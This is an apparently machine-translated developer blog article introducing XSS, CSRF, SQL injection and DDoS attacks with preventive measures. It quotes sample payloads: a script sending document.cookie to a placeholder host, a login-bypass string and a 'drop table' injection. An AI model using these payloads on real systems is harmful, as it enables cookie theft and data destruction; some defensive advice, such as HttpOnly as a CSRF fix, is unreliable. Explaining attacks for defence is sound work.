当前位置:网站首页>Common web attacks and defense
Common web attacks and defense
2022-07-25 11:28:00 【InfoQ】
As a web developer ,web Safety needs to be understood ,web An attack is an attack against a user's online behavior or a website server and other devices , Such as planting malicious code , Modify site permissions , Obtain website user privacy information, etc . Since the birth of the Internet , Network security threats have been accompanied by the development of websites , Various web Attacks and information leaks have never stopped . This article introduces common web Attack mode and preventive measures .
- XSS( Cross-site scripting attacks )
- CSRF( Cross-site request forgery )
- SQL Inject
- DDOS
XSS
Cross site scripting attack refers to an attacker embedding malicious scripts in a web page , When the user opens a web page , The malicious script starts executing , Stealing users cookie, User name, password and other information
For example, in a publishing system , An attacker embeds similar code in the content
<script>window.open('www.xxx.com?param=' + document.cookie)</script>, When users visit this page , Will execute malicious code , The user's cookie Will be sent to the attacker's server .
Preventive measures :
- Will be important cookies Marked as http only, such JavaScript Medium document.cookie Statement cannot get cookie 了 ;
- Only allow users to enter the data we expect , Such as age textbox Only numbers are allowed in the , The rest is filtered ;
- On data Html Encode Handle , Such as < Turn into <、& Turn into &
- Filter or remove special Html label , Such as :script、iframe;
- Filter JavaScript Label of event , Such as “onclick=”、“onfocus” etc. .
CSRF
Cross Site Request Forgery refers to sending malicious requests to third-party websites in the name of users by stealing user information , Stealing account number , Transfer accounts , Send a message , Delete data, etc
Users log in to trusted sites A -> Did not quit visiting the malicious site B -> From the site B Initiate a visit to the site A Malicious request
Preventive measures :
- Cookie Set up HttpOnly,JS Can't read it cookie Information in , Avoid attackers forging cookie The situation of .
- Don't use cookie verification , Change token Method validation
- adopt referer distinguish , Verify that the page is a trusted site
SQL Inject
SQL Injection attack refers to putting SQL The statement pretends to be normal http request , Cheat the server to execute malicious SQL sentence , To achieve the purpose of invasion .
' or '1'= '1. This is the most common sql Injection attack , When we enter the user name jiajun , Then enter the password'or '1'= '1When , When we check whether the user name and password are correct , What was to be done wasselect * from user where username='' and password='', After parameter splicing , Will execute sql sentenceselect * from user where username='jaijun' and password=' ' or ' 1'='1 ', This is the time 1=1 It was established , It's natural to skip verification .
- But if it's more serious , The password entered is
';drop table user;--, that sql The order isselect * from user where username='jiajun' and password='';drop table user;--'At this time, we will delete this table directly
Preventive measures :
- Special characters into the database (
'"\ Angle brackets &*; etc. ) Escapes , Or transcoding .
- It is recommended to use professional SQL Inject a detection tool to detect , Repair what is found in time SQL Inject holes . There are many open source tools on the Internet , for example sqlmap、SQLninja etc.
- Avoid printing out the website SQL error message , For example, type error 、 Field mismatch, etc , Put... In the code SQL The statement is exposed , To prevent attackers from using these error messages to SQL Inject .
DDOS
Distributed service attack , With the help of public network , A huge number of calculator devices ( chicken ) unite , Attack one or more targets , So as to paralyze the target host .
- SYN Flood , Just briefly tcp Three handshakes , The client sends a request to the server first , Request to establish a connection , Then the server returns a message , Indicate that the request was accepted , Then the client will also return a message , Finally, establish the connection . So if there is such a situation , The attacker faked ip Address , Send a message to the server to request connection , At this time, the server receives , according to tcp The rule of three handshakes , The server also responds to a message , But this ip It's a forgery , To whom does the message respond , There was an error in the second handshake , The third time will not go smoothly , At this time, the server cannot receive the message sent by the client during the third handshake , Repeat the second handshake . If the attacker forged a large number of ip Address and send a request , At this time, the server will maintain a very large semi connection waiting list , It takes up a lot of resources , Finally, the server crashed
- CC attack , At application level http Attack on the protocol , Simulate normal users to send a large number of requests until the website is out of service .
- DNS query flood The attacker forged a large number of invalid domain names , Send to the target server for resolution , These domain names are invalid , Lead to DNS The server consumes a lot of resources to deal with these invalid domain names , cause DNS Domain name resolution timeout , Achieve the purpose of attack .
Preventive measures :
- Increase bandwidth , But bandwidth is very expensive
- Cleaning and filtration of abnormal flow
- Filtering unnecessary services and ports
- Advanced anti intelligence DNS analysis
- Deploy CDN
summary
The above is just a list of common web attacks , It's quite common web Safety topics , As well as some prevention schemes, many security problems will be encountered in the actual development process , For these questions , We can't ignore , The vulnerability of any application on the server may be a breakthrough for hackers to capture the server . In addition to the above common ways , There are still a lot of it web Safety topics , Interested students can continue to study .
边栏推荐
- Google Earth engine -- Statistics on the frequency of land classification year by year
- Getting started with redis
- A troubleshooting record of DirectShow playback problems
- 让运动自然发生,FITURE打造全新生活方式
- SQL语言(二)
- LVS负载均衡之LVS-NAT搭建Web群集
- Implementation of recommendation system collaborative filtering in spark
- Ue4.26 source code version black screen problem of client operation when learning Wan independent server
- 黑客入门教程(非常详细)从零基础入门到精通,看完这一篇就够了。
- Learn NLP with Transformer (Chapter 4)
猜你喜欢
ArcMap无法启动解决方法
史上最全的立创元器件封装库导入AD详细教程(一直白嫖一直爽)
Learn NLP with Transformer (Chapter 7)
![[flask advanced] combined with the source code, explain the operation mechanism of flask (in and out of the stack)](/img/a0/9110b83ff5c7965809bbc9f3948956.jpg)
[flask advanced] combined with the source code, explain the operation mechanism of flask (in and out of the stack)
HCIP(13)
SQL语言(三)
leetcode 剑指 Offer 28. 对称的二叉树
Nowcodertop1-6 - continuous updating
What kind of product power does Hongguang miniev, the top seller of new energy, have?
Hcip experiment (03)
随机推荐
Learn NLP with Transformer (Chapter 5)
Learn Luzhi PHP -- tp5.0 uses Chinese as an alias and reports "unsupported data expression"
Learn NLP with Transformer (Chapter 7)
Stm32cubemx learning record -- installation, configuration and use
SQL语言(四)
Nowcodertop7-11 - continuous updating
SQL语言(二)
C# Newtonsoft. Jason advanced usage
Learn NLP with Transformer (Chapter 8)
shell- 第七章练习
HCIP(13)
HCIA experiment (06)
SQL注入 Less18(头部注入+报错注入)
shell-第六章练习
Implementation of recommendation system collaborative filtering in spark
MLX90640 红外热成像仪测温模块开发笔记(五)
为什么重写equals()方法必须要重写hashCode()方法
[flask advanced] solve the classic error reporting of flask by combining the source code: working outside of application context
LVS负载均衡之LVS-NAT搭建Web群集
让运动自然发生,FITURE打造全新生活方式